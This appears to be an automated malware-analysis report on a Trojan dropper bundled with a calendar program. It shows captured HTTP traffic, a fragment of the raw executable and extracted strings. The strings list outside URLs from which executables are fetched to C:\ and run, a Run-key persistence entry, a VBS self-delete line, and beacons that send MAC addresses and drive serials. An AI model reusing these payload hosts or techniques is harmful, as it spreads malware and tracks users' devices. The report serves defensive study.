eview="0";.if (mt_preview == 1).{..  var height0=60;..  var width0=460
;..  if ((width0==120 && height0==600) || (width0==160 && height0==600
) || (width0==200 && height0==200) || (width0==250 && height0==250) ||
 (width0==300 && height0==250) || (width0==336 && height0==300) ||
<<< skipped >>>

GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1


Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:45 GMT
Content-Type: text/plain
Content-Length: 160
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:45 2014
X-XSS-Protection: 0
SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,.
"m":"MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"19858
23318692344632".}});HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 
2014 09:00:45 GMT..Content-Type: text/plain..Content-Length: 160..Conn
ection: keep-alive..Cache-Control: no-cache..Pragma: no-cache..P3P: CP
="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC
 NOI DSP COR"..Expires: Mon, 26 Jul 1997 08:00:00 GMT..Last-Modified: 
Sat Jun 14 17:00:45 2014..X-XSS-Protection: 0..SOGOU_STAR_SETJSONADSLO
T({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0NV9wcm
V0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"1985823318692344632".}});ont>....


GET /ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Content-Length: 7404
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ad=vLpiSyllll2FXlDElllllVntR8DlllllZYr1iZllllGlllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:47 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:47 2014
X-XSS-Protection: 0
<html>.<head>.<title></title>.<style>.&l
t;!--.body{margin:0;background-color:transparent;}..sogou{width:460px;
 height:60px;position:relative;overflow:hidden;}.a.logo{display:block;
height:18px;width:26px;text-align:justify;letter-spacing:20px;text-dec
oration:none;overflow:hidden;cursor:default;position:absolute;bottom:0
px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.
AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/s
ogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.int
e.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_backgr
ound:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransf
orm.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.c
om/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url
(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left
 top;_background:none;}..sogou a.normal{}.-->.</style>.</h
ead>..<body>.<iframe id="tanxcmiframe" width="0" height="0
" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></i
frame>.<script type="text/javascript">.var iheight = "60";.va
r fsize = iheight;.if (iheight >= 30).{.    fsize = 30;.}.var mt_pr
eview="0";.if (mt_preview == 1).{..  var height0=60;..  var width0=460
;..  if ((width0==120 && height0==600) || (width0==160 && height0==600
) || (width0==200 && height0==200) || (width0==250 && height0==250) ||
 (width0==300 && height0==250) || (width0==336 && height0==300) ||
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1638400-1843200
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1638400-1843200/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:16 GMT
>...^(>.>.K..b.l.<....DzX....ejx...E.2.f.........|.....:..
KSOMO..m.....#....#bqE.......^..ZT~.F.a.n.Q...%.Q..K.v..J<.....b.L.
U........k..*E..&....0....=s....<. OfJ..g]..J.H.\5...Y{Y[......W.1.
.x0..a&...s#.[......0i...VC../9....1.w..*g..c.X.G=....... Y.D0..;...CV
..'v....t.r\Y.E.........JR.[g...?J/..o..pT#v...3.m.*._.b...s.I=k.'vD./
.w1q.'.<...W..`.n.,....$......d..|TQ.....9...) .]..mS.Sb._oN9...*,.
3O..G%..K l.D...z?o..Io%|.....6....<mrS.A..wf>../...1.....C.1:V)
z0..C....WO_..2=...F..*....H.$g....b...:.E.cq..d..(s<.....)|J..(...
.........~..$........0....D......#3.?*4..;DJ....<..".......T.1G....
..s....R..b......c....;.J....S.......a....F.gn..8..;&. 1..v4:..}X..N7.
...&.f.?..9^..n..c ....7.:....IE.....vA....N..d\..#...n.......B.;...K.
<..3YR.%Z..*. ....&..0.....q...{BK.h..$_.O..../...>qOF..=..t...Q
4.`V._.8.!Jd\."e.....k..A.x.).R5..<....*.L!......p8A.ba%...H....kb.
..........{............?~-..&$..=J......S...r............j..W'\.......
..]..o0..........|..b)......P.k._..^....'yz.y......q......_......f..D.
..u.5.R.......FS.G-C....n.1..1j.VKp~.SKd.8.....(9......G..).8_.....o.B
UPA....n\L.w../.....g.....jj..Nd/.wv...eq.W.@...........>..yr.Y.&wD
....GR.#4c.V..'..7..De...%.3.{<..W..).&|:B.;{.W..........IA...d..a.
.Q...I...n..n .f.......Y.yp...9.z......<C.$.......I,R.o.b.>.7.m.
.Ed.-...6.....*1j(y?....I._ck5..J&......"oi..."[email protected]..,.g.K...
J.M.<.azH4").V.....>..*zW...!I.'.-!.x.K.h..^..........B..l..[_y.
).......[.Z..OB...\.W..>N...R.w;....oP... fHJ..7.E...u.........
<<< skipped >>>


GET /api/GetConfig.ashx HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 330
{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncoun
t":"1","setupcode":"0d28db4036a945fd9e9761f04cd18d62","showminitab":"1
","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabra
te":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrd
n.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}....


GET /Api/GetHoliday.ashx HTTP/1.1


User-Agent: FhCalendar
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 876
{"errno":"1","info":[{"holidayname":"......","holiday":"2014-01-31","r
estday":"2014-01-31,2014-02-01,2014-02-02,2014-02-03,2014-02-04,2014-0
2-05,2014-02-06","work":"2014-01-26,2014-02-08"},{"holidayname":".....
.","holiday":"2014-01-01","restday":"2014-01-01","work":""},{"holidayn
ame":".........","holiday":"2014-04-05","restday":"2014-04-05,2014-04-
06,2014-04-07","work":""},{"holidayname":".........","holiday":"2014-0
5-01","restday":"2014-05-01,2014-05-02,2014-05-03","work":"2014-05-04"
},{"holidayname":".........","holiday":"2014-06-02","restday":"2014-05
-31,2014-06-01,2014-06-02","work":""},{"holidayname":".........","holi
day":"2014-09-08","restday":"2014-09-06,2014-09-07,2014-09-08","work":
""},{"holidayname":".........","holiday":"2014-10-01","restday":"2014-
10-01,2014-10-02,2014-10-03,2014-10-04,2014-10-05,2014-10-06,2014-10-0
7","work":"2014-09-28,2014-10-11"}]}....


GET /Api/GetWeather.ashx?province=??&city=?? HTTP/1.1


User-Agent: FhCalendar
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 13
{"error":"0"}HTTP/1.1 200 OK..Date: Sat, 14 Jun 2014 09:01:23 GMT..Ser
ver: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 2.0.5
0727..Cache-Control: private..Content-Type: text/plain; charset=utf-8.
.Content-Length: 13..{"error":"0"}..



GET /cms.gif?id=40490128&extendata= HTTP/1.1
Accept: */*
Referer: hXXp://dspcm.brand.sogou.com/qi
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: acookie.tanx.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: Tengine
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: image/gif
Transfer-Encoding: chunked
Connection: close
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Location: hXXp://dspcm.brand.sogou.com/pixel?tid=E0&ver=1&extendata=
31..GIF89a...................!.......,...........T..;..0..



GET /oemini/info.ini?id=41 HTTP/1.1
User-Agent: oemfhsli
Host: software.fhrlw.cn


HTTP/1.1 200 OK
Content-Length: 997
Content-Type: .ini
Last-Modified: Fri, 13 Jun 2014 08:44:03 GMT
Accept-Ranges: bytes
ETag: "4415c5a0e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:47 GMT
[Info]..FileCount = 1..Rate0 = 100..Rate1 = 70..[File0]..FileName=fhrl
_0613.exe..FileDir= fhrl..FileTitle= ..........DocUrl = hXXp://VVV.fhr
lw.com/readme.html..urlCount=2..url0=hXXp://dl1.fhrlw.com/fhrl/fhrl_06
13.exe..url1=hXXp://dl2.fhrlw.com/fhrl/fhrl_0613.exe....BlockCount=12.
.BlockSize0=204800..Hash0=31171D0C6216B1555E85D7EC89AF40F1..BlockSize1
=204800..Hash1=E1AA7FC27B8979618CF31CD1CF06829B..BlockSize2=204800..Ha
sh2=0C88B5B81B4BCDB92DDD042D79554E5E..BlockSize3=204800..Hash3=3CF4215
3EC58C3560A92DC9062CA08A6..BlockSize4=204800..Hash4=C3C74AB7AE92A4ACFE
EE460E8AEA6C47..BlockSize5=204800..Hash5=0E120EA4DA635D3847459411AC674
1E0..BlockSize6=204800..Hash6=D7C70FED90A30442DDAB5FCE3BDDB3A1..BlockS
ize7=204800..Hash7=654F71158BB01559F0A6D0DAC1318A3E..BlockSize8=204800
..Hash8=8843F00044AF9C94DAFB599CFB583203..BlockSize9=204800..Hash9=9DD
6488FBA152DA7B3C4DCECDF778EDA..BlockSize10=204800..Hash10=CC86E269AB6B
2D6CB588D3F69C7D00B3..BlockSize11=174816..Hash11=CFE74D55CD85196E8D934
D31902D9D1B..HTTP/1.1 200 OK..Content-Length: 997..Content-Type: .ini.
.Last-Modified: Fri, 13 Jun 2014 08:44:03 GMT..Accept-Ranges: bytes..E
Tag: "4415c5a0e386cf1:4d6"..Server: Microsoft-IIS/6.0..X-Powered-By: A
SP.NET..Date: Sat, 14 Jun 2014 09:00:47 GMT..[Info]..FileCount = 1..Ra
te0 = 100..Rate1 = 70..[File0]..FileName=fhrl_0613.exe..FileDir= fhrl.
.FileTitle= ..........DocUrl = hXXp://VVV.fhrlw.com/readme.html..urlCo
unt=2..url0=hXXp://dl1.fhrlw.com/fhrl/fhrl_0613.exe..url1=hXXp://dl2.f
hrlw.com/fhrl/fhrl_0613.exe....BlockCount=12..BlockSize0=204800..H
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1832:

.text
`.rdata
@.data
.rsrc
.aspack
.adata
t$(SSh
~%UVW
u$SShe
kernel32.dll
user32.dll
EnumWindows
ShellExecuteA
http://software.fhrlw.cn/slience/fhsli_6_12001.exe
C:/fhsli_6_12001.exe
C://fhsli_6_12001.exe
http://ddl.9yfc.com/xxdd_165.exe
C:/xxdd_165.exe
C://xxdd_165.exe
http://wuji.oss-cn-hangzhou.aliyuncs.com/qd/114gglm_016.exe
C:/114gglm_016.exe
C://114gglm_016.exe
http://dl.meinvkankan.com/goodpic_dae_627.exe
C:/goodpic_dae_627.exe
C://goodpic_dae_627.exe
http://lm.beilequ.com/update/365/365weatherIns_137.exe
C:/365weatherIns_137.exe
C://365weatherIns_137.exe
http://home.yj005.com/JBDownload/jbist_[2018].exe
C:/jbist_[2018].exe
C://jbist_[2018].exe
http://down.duomi.com/DuomiMusic_V306.exe
C:/DuomiMusic_V306.exe
C://DuomiMusic_V306.exe
http://down.shuyeer.net/dudu/dudu_b_55279.exe
C:/dudu_b_55279.exe
C://dudu_b_55279.exe
http://dianxinshu.92ttz.com/download/setup_s1002.exe
C:/setup_s1002.exe
C://setup_s1002.exe
http://qq2847894.b.xundisk.net/x1.exe
c:/x1.exe
c://x1.exe
http://boxdown.gtui.cn/KXWebDown/KXWebBox_3317_RBF.exe
C:/KXWebBox_3317_RBF.exe
C://KXWebBox_3317_RBF.exe
bbs.125.la
tem.vbs
fso.DeleteFile("
Set fso = CreateObject("Scripting.FileSystemObject")
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
RASAPI32.dll
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
u.ht*D
@u.Wj
hhctrl.ocx
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
File%d
MSWHEEL_ROLLMSG
GDI32.DLL
MSH_SCROLL_LINES_MSG
{X-X-X-XX-XXXXXX}
ddeexec
%s\ShellNew
%s\DefaultIcon
%s\shell\printto\%s
%s\shell\print\%s
%s\shell\open\%s
ECTrans.dll
RegEnumKeyA
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyA
Backup\Backup.ini
KINGSOFTFASTAIT3CHNEXEMUTEX
SOFTWARE\Kingsoft\FastAIT\3.0\ChnEXE
CChnEXEDoc
KPGs\*.KPG
KPGMaker.exe
ChnEXE.chm
KPIs\*.KPI
TEMPPE.WN
.?AVCToolCmdUI@@
.?AVCStatusCmdUI@@
KERNEL32.DLL
,),,,,**((%%!
9111111113
3111111111
411111111111
41111111111111
6%%%!!"'- :
311111111111111
2611111111111111
1(%%%%!!"
9111111111111111
6%%%%!"'/ #=
3111111111111111
((%%%%!!
@%%%%!!"
261111111111111111
6(%%%%!!"
4111111111111111111
3111111111111111111
41111111111111111111
((%%%%!!"
@(%%%%!!"
6(%%%%!"
@(%%%!!"
@%%%%!!!
6%%%%!!"
@%%%%!!!"
](%%%%!!"
6%%%%!!!"
6%%%%!!!
](%%%%!!!"
[---'%!!!"
:--'%%!!!
:-'%%%!!!
-'%%%%!!!
3%%%%!!!"
---44--- 42
`.%%%%!!!"
(111.3..3=>
9.333//'.39>
6%%%%!!'
9/31111%.39>
#### # ''
#### ##--
### $$4-
$$$#    #-=
.%%%%!!!"
sssh~~h
].%%%!!!""
6%%%%!!""
6%%%!!!""
}|||}}mm}||sshkmm~~}}
q___hh__sshkhh__s
@%%%!!!""
lexeetx
>?@?==?@@@
].!%!!!""
=@@???=@@@
6%%!!!!""
?@@???=@@@
6%%!!!"""
=@@??==?@@@
6%%!!!""
>?@???==@@@@
9%%!!!""
      # '(%%%%!!%%!' 2>::444-9
?%%!!!""
          '%%%!!''''./>24:444 9[
3%%!!!""
:.%!!!""
-       4-.FGHP
%%9:<'
CJKTAB32.dll
c:\KConvert Files
\/:*?"<>|
%s%s%d%s
:?0_1#"9
#include "l.chs\afxres.rc" // Standard components
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
rasapi32.dll
gdi32.dll
winmm.dll
winspool.drv
advapi32.dll
shell32.dll
oleaut32.dll
comctl32.dll
ws2_32.dll
wininet.dll
CHNEXE
2, 0, 0, 2
ChnEXE
ChnEXE.EXE
ChnEXE.Document
ChnEXE Document
(*.*)
%s ...1
%s ...#
%s ...
(*.EXE)|*.exe|
Output.prn$
1, 0, 0, 0
KConvert.EXE
KConvert.Document
\ / : * ? " < > |
(*.*)|*.*||
1.0.0.0
(http://www.eyuyan.com)

%original file name%.exe_1832_rwx_00566000_00002000:

kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
rasapi32.dll
gdi32.dll
winmm.dll
winspool.drv
advapi32.dll
shell32.dll
ole32.dll
oleaut32.dll
comctl32.dll
ws2_32.dll
wininet.dll
comdlg32.dll
ShellExecuteA
InternetCanonicalizeUrlA
1.0.0.0
(http://www.eyuyan.com)

FhCalendar.exe_588:

.text
`.rdata
@.data
.rsrc
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
CNotSupportedException
CCmdTarget
CHttpFile
hhctrl.ocx
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
GetProcessWindowStation
USER32.DLL
operator
S"S$S%S'S(S)S S,S-S/S0S1S2S3S4S5S6S7S8S
U!U%U&U?
X"X#X%X&X'X(X)X X,X-X.X/X1X2X3X4X6X7X8X9X:X;XX?X@XAXBXCXEXFXGXHXIXJXKXNXOXPXRXSXUXVXWXYXZX[X\X]X_X`XaXbXcXdXfXgXhXiXjXmXnXoXpXqXrXsXtXuXvXwXxXyXzX{X|X}X
_!_"_#_$_?
%d'd(d)d d.d/d0d1d2d3d5d6d7d8d9d;dd@dBdCdIdKdLdMdNdOdPdQdSdUdVdWdYdZd[d\d]d_d`dadbdcdddedfdhdjdkdldndodpdqdrdsdtdudvdwd{d|d}d~d
"e#e$e&e'e(e)e*e,e-e0e1e2e3e7e:e
"P%Q%R%S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%b%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q%r%s%
1 1!1"1#1$1%1&1'1(1)1
!0"0#0$0%0&0'0(0)0
% %!%"%#%$%%%&%'%(%)%*% %,%-%.%/%0%1%2%3%4%5%6%7%8%9%:%;%<%=%>%?%@%A%B%C%D%E%F%G%H%I%J%K%
W%f?i
e.lFO
}!}#}$}%}&}(})}*},}-}.}0}1}2}3}4}5}6}
urlsS
~ ~!~"~#~$~%~&~'~(~)~*~ ~,~-~.~/~0~1~2~3~4~5~6~7~8~9~?
u%urrGS
]']&].]$]
s"s9s%s,s8s1sPsMsWs`slsos~s
x
{.{1{ {%{${3{>{
closeMiniUrl
closePopUrl
203.117.180.36
232,1!2@
e:\FhWork\Work\FhCalendar\Release\FhCalendar.pdb
KERNEL32.dll
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
UrlUnescapeW
SHLWAPI.dll
oledlg.dll
DuiLib_u.dll
WINMM.dll
WS2_32.dll
IPHLPAPI.DLL
InternetCrackUrlW
InternetCanonicalizeUrlW
InternetOpenUrlW
WININET.dll
OLEACC.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
CreateDialogIndirectParamW
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
WINSPOOL.DRV
COMDLG32.dll
RegCreateKeyExW
RegDeleteKeyW
RegOpenKeyW
RegEnumKeyW
.PAVCOleException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCCmdUI@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCArchiveException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCFileException@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
zcÁ
.?AVCCmdTarget@@
.PAVCInternetException@@
.?AVCMiniWebWnd@@
.?AVCPopWebWnd@@
.?AVCMD5@@
.?AVCMD5File@@
5*5)5*5)5*5)5*5)5*5)5*5)5*5)5*5)5*5*5)*4
!>qMRqqq=jqq;q@!!%dpRBepZpqeGe2!!
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
kernel32.dll
%s%s.dll
A%s (%s:%d)
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
Acomctl32.dll
Acomdlg32.dll
Ashell32.dll
http://
@WININET.DLL
mfcm90u.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
user32.dll
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
mscoree.dll
KERNEL32.DLL
xbasicSetting.xml
subdivis.db
timedate.cpl
http://www.fhrlw.com
Software\Microsoft\Windows\CurrentVersion\Run
S_11.png
S_22.png
clocknote_list_item.xml
{b}%s{/b}
%d-d-d d:d
pg1_operation_small
pg1_operation_big
{c #808080}%d-d-d d:d{/c}
index.png
index_1.png
clock_note_setting.xml
xfhnotetip.xml
menu.xml
Update.exe
Updatb.exe
Update_bak.exe
FMTest.exe
\FMDLL32.dll
FMDLL32.dll
GetMsgProc
xfh.xml
http://client.fhrlw.com/ad/shopping.html?id=%d
Skin\warn.wav
pg2_web
data.db
info.db
note.ini
%d-d-d
%d/d/d
%c%d%d%d
http://client.fhrlw.com/ad/fixad.html?id=%d
%s(%d/d/d)
clock_del_nor.png
clock_del_hov.png
clock_del_push.png
finish_nor.png
finish_hov.png
finish_push.png
%d-%d-%d
%c%d%d
jintian3.png
huangli.xml
%d-01-01
%s{n}
{c #ff0000}%d{/c}
{n}{c #ff0000}%s{/c}
http://client.fhrlw.com/Api/GetHoliday.ashx
http://client.fhrlw.com/Api/GetWeather.ashx?province=%s&city=%s
ohttp://client.fhrlw.com/Api/SendClickData.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s&date=%s&clickcount1=%d&clickcount2=%d&clickcount3=%d&clickcount4=%d
http://client.fhrlw.com/Api/Sendndays2openData.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s&ndays=%d
http://client.fhrlw.com/Api/getRightDownState.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s
http://client.fhrlw.com/Api/onlineLength.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s
http://client.fhrlw.com/api/GetConfig.ashx
xhlwnd.xml
EKey
dd
%s%s
%s%s
%Y-%m-%d %H:%M:%S
MiniWebWnd
xminiweb.xml
web_info
http://client.fhrlw.com/mini.html?id=%d
EPopWebWnd
xpopweb.xml
http://client.fhrlw.com/ad/popad.html?id=%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
%%%2x
%Program Files%\fhrl\FhCalendar.exe
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
1.0.0.1
FhCalendar.exe

MSIB.tmp_916:




.text
`.rdata
@.data
.rsrc
@.reloc
KERNEL32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
11.0.0.0
viewer.exe

SportLive.exe_908:




.text
.rdata
.data
.rsrc
.reloc
.aspack
.adata
Pht%D
CCmdTarget
CNotSupportedException
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
kernel32.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
